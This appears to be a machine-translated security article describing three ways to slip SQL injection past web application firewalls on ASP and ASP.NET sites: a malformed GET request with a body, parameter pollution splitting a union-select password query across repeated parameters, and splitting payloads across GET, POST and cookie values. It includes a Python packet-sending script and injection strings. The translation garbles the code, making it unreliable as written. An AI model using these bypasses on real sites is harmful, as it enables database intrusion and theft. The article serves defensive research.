Several Methods for bypassing WAF

Site: www.80sec.com

0 × 00 Preface
At the beginning of, an SQL group injection attack was launched. Hackers swept away the asp, asp.net, and MSSQL websites around the world. Because MSSQL supports multi-statement injection, hackers can use a combined SQL statement to automatically tamper with the field content of the entire database and perform webpage Trojan attacks without any difference on the website.

The Internet is updated and iterated quickly, but many organizations that do not have the ability to develop are building websites through outsourcing. Once the website program is launched, it is no longer maintained. Many programs have various vulnerabilities that cannot be repaired, as a result, WAF has a market. Today, WAF, a software that has a low threshold and can solve the most problems, is aimed at IIS/apache. It is usually done by one extension of a module, of course, there are also millions of hardware WAF resources. However, if WAF interception rules are prone to vulnerabilities, these millions of hardware will be a pile of scrap iron. Can WAF solve all WEB security problems? Therefore, this article mainly analyzes some rare vulnerabilities that can bypass WAF for security reference.

0 × 01 packet Parsing Vulnerability of the Request object.
A packet parsing vulnerability exists in the Request objects of asp and asp.net. The Request object is too loose in the GET and POST packages. In one sentence, it is the Request object. It cannot be clearly divided by GET and POST, if you have a little web development experience, you should know that the Request receives GET, POST, and COOKIE, that is, the data transmitted by GPC, but asp and. the built-in Request object of the net Library does not comply with the RFC standard at all. We can perform a test below:

Save the following two sections of code as 1. asp and 1. aspx respectively.

Use the asp Request object to receive t parameter values
----------------
<%
Response. Write "Request:" & Request ("t ")
%>
----------------

Use asp.net's Request object to receive t parameter values
----------------
<% @ Page Language = "C #" %>
<%
String test = Request ["t"];
Response. Write ("Request:" + test );
%>
----------------

Use the following python script to call socket to send the original HTTP package
----------------
#! /Usr/bin/env python

Import socket

Host = 'www .2cto.com ′
Path = '/1. asp'
Port = 80

S = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
S. connect (host, port ))
S. settimeout (8)

Exploit_packet = "t = '/**/or/**/1 = 1 -"
Exploit_packet + = "\ r \ n" * 8
Packet_length = len (exploit_packet)
Packet = 'get' + path + 'HTTP/1.1 \ r \ N'
Packet + = 'host: '+ Host +' \ r \ N'
Packet + = 'content-Length: % s \ r \ n' % packet_length
Packet + = 'content-Type: application/x-www-form-urlencoded \ r \ N'
Packet + = '\ r \ N'
Packet = packet + exploit_packet

Print packet
S. send (packet)
Buf = s. recv (1000)
If buf: print buf [buf. rfind ("\ r \ n"):]
S. close ()
----------------

The original package we sent is:
GET/1. asp HTTP/1.1
Host: www.2cto.com
Content-Length: 34
Content-Type: application/x-www-form-urlencoded

T = '/**/or/**/1 = 1-

The result is as follows:
Request: '/**/or/**/1 = 1-
Change the path of the python test script to the/1. aspx test page and return the same result.

We can see that this is a malformed http get request package, the mysteries of this package are t = '/**/or/**/1 = 1-the eight carriage return headers after the parameter line feed and Content-Length headers, the structure of the package is similar to a POST package, and the Request method is GET. Finally, the Request object of asp and asp.net successfully parses the malformed package and extracts the data.

Therefore, if the WAF does not process the HTTP packet content and follows the conventional logic to process the GET and POST logic, the malformed package will destroy WAF's basic defense.

0 × 02 forgotten complex parameter attack.

You should remember the HTTP Parameter Pollution attack in. Check [3] documentation to find ASP/IIS and ASP. NET/IIS scenario has a complex parameter feature. This article will take advantage of this feature for short as a complex parameter attack, with the example in 0X01 for a simple test:

Use the GET request to pass in two t Parameters
GET http://www.bkjia.com/1.asp? T = 1 & t = 2
Returns
Request: 1, 2

The Request objects of asp and asp.net receive two parameters and are separated by commas. Therefore, the SQL injection method for complex parameters in the [3] document is derived:

Vulnerable code:
SQL = "select key from table where id =" + Request. QueryString ("id ")

This request is successfully completed MED using the HPP technique:
/? Id = 1/**/union/* & id = */select/* & id = */pwd/* & id = */from/* & id = */users

The SQL request becomes:
Select key from table where id = 1/**/union/*, */select/*, */pwd/*, */from/*, */usersLavakumarKuppan,

We can see that SQL Injection statements in GET parameters can be separated by clever use of annotators combined with complex parameters. Will WAF fail to match the interception rules if it is too simple to process GET parameters?

0 × 03 advanced complex parameter attack.

ASP. NET Request object has a Params attribute, ASP.. NET programmers use Request. params ["xxx"] transmits data. For details, refer to [4] Microsoft MSDN documentation. We can understand the features of the Params attribute. This attribute receives a set of GET, POST, and Cookie values, here we can modify the example in 0 × 01 to test it.
Use asp.net's Request. Params method to receive t parameter values
----------------
<% @ Page Language = "C #" %>
<%
String test = Request. Params ["t"];
Response. Write ("Request:" + test );
%>
----------------

Send a POST packet, GET, POST, and COOKIE with different t Parameters
----------------
POST http://www.bkjia.com/1. aspx? T = 1 HTTP/1.1
Host: www.2cto.com
Cookie: t = 2

T = 3
----------------

Result returned
Request: 1, 3, 2

Finally, the Request. the data received by the Params method is integrated in the GPC order. The students here think that the 0 × 02 re-argument attack should be filled in like the limit argument. We can split the SQL attack statement into GET, POST, COOKIE three variables for combined attacks. Think about whether WAF is able to defend against this advanced complex parameter attack?

0 × 04

It is impossible for WAF to solve all security problems. The idea of this article is based on the differences between the number of HTTP packets processed by WAF and the number of HTTP packets processed by the server. The Internet is constantly updated and iterated, and the difference exists. Similar vulnerabilities also exist.
This article mentions three ways to bypass WAF. The first is that my originality belongs to the 0-day state, and the second is to refer to the existing complex parameter attacks, among them, the third advanced complex parameter attack was proposed by Safe3. This article also discussed the waf bug with Safe3, so I would like to thank Safe3.
In addition, please do not use the content in this article for illegal channels. It is for the reference of security personnel only. Thank you.

Refer:
Http://www.faqs.org/rfcs/rfc2616.html.
Http://www.w3school.com.cn/asp/asp_ref_request.asp.
Http://www.ptsecurity.com/download/PT-devteev-CC-WAF-ENG.pdf.
Http://msdn.microsoft.com/en-us/library/system.web.httprequest.aspx.